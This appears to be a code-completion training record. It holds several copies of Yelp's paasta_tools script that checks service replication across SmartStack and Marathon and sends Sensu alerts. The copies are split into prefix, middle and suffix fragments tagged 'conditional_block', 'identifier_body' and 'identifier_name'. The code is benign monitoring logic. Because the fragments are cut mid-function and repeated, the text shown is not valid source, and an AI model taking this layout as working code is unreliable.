# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir)
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main()
| expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output) | conditional_block |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# This function assumes the input is a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def check_smartstack_replication_for_instance(
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config)
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output)
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
|
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main()
| rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir) | identifier_body |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# This function assumes the input is a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def | (
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config)
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output)
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
# the best we can do is check marathon for replication (for now).
if proxy_port is not None and registrations[0] == instance_config.job_id:
check_smartstack_replication_for_instance(
instance_config=instance_config,
expected_count=expected_count,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
check_healthy_marathon_tasks_for_service_instance(
instance_config=instance_config,
expected_count=expected_count,
all_tasks=all_tasks,
)
def list_services(soa_dir):
rootdir = os.path.abspath(soa_dir)
return os.listdir(rootdir)
def main():
args = parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
system_paasta_config = load_system_paasta_config()
cluster = system_paasta_config.get_cluster()
clients = marathon_tools.get_marathon_clients(marathon_tools.get_marathon_servers(system_paasta_config))
all_clients = clients.get_all_clients()
all_tasks = []
for client in all_clients:
all_tasks.extend(client.list_tasks())
mesos_slaves = a_sync.block(get_slaves)
smartstack_replication_checker = SmartstackReplicationChecker(mesos_slaves, system_paasta_config)
for service in list_services(soa_dir=args.soa_dir):
service_config = PaastaServiceConfigLoader(service=service, soa_dir=args.soa_dir)
for instance_config in service_config.instance_configs(
cluster=cluster,
instance_type_class=marathon_tools.MarathonServiceConfig,
):
if instance_config.get_docker_image():
check_service_replication(
instance_config=instance_config,
all_tasks=all_tasks,
smartstack_replication_checker=smartstack_replication_checker,
)
else:
log.debug(
'%s is not deployed. Skipping replication monitoring.' %
instance_config.job_id,
)
if __name__ == "__main__":
main()
| check_smartstack_replication_for_instance | identifier_name |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# This function assumes the input is a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def check_smartstack_replication_for_instance(
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config) |
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
expected_count_per_location = int(expected_count / len(smartstack_replication_info))
output = ''
output_critical = ''
output_ok = ''
under_replication_per_location = []
for location, available_backends in sorted(smartstack_replication_info.items()):
num_available_in_location = available_backends.get(instance_config.job_id, 0)
under_replicated, ratio = is_under_replicated(
num_available_in_location, expected_count_per_location, crit_threshold,
)
if under_replicated:
output_critical += '- Service %s has %d out of %d expected instances in %s (CRITICAL: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
else:
output_ok += '- Service %s has %d out of %d expected instances in %s (OK: %d%%)\n' % (
instance_config.job_id, num_available_in_location, expected_count_per_location, location, ratio,
)
under_replication_per_location.append(under_replicated)
output += output_critical
if output_critical and output_ok:
output += '\n\n'
output += 'The following locations are OK:\n'
output += output_ok
if any(under_replication_per_location):
status = pysensu_yelp.Status.CRITICAL
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that a SmartStack powered loadbalancer (haproxy)\n"
" doesn't have enough healthy backends. Not having enough healthy backends\n"
" means that clients of that service will get 503s (http) or connection refused\n"
" (tcp) when trying to connect to it.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply not have enough copies or it could simply be\n"
" unhealthy in that location. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * You can view the logs for the job with:\n"
" paasta logs -s %(service)s -i %(instance)s -c %(cluster)s\n"
"\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
"\n"
" * Widen SmartStack discovery settings\n"
" * Increase the instance count\n"
"\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
else:
status = pysensu_yelp.Status.OK
log.info(output)
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
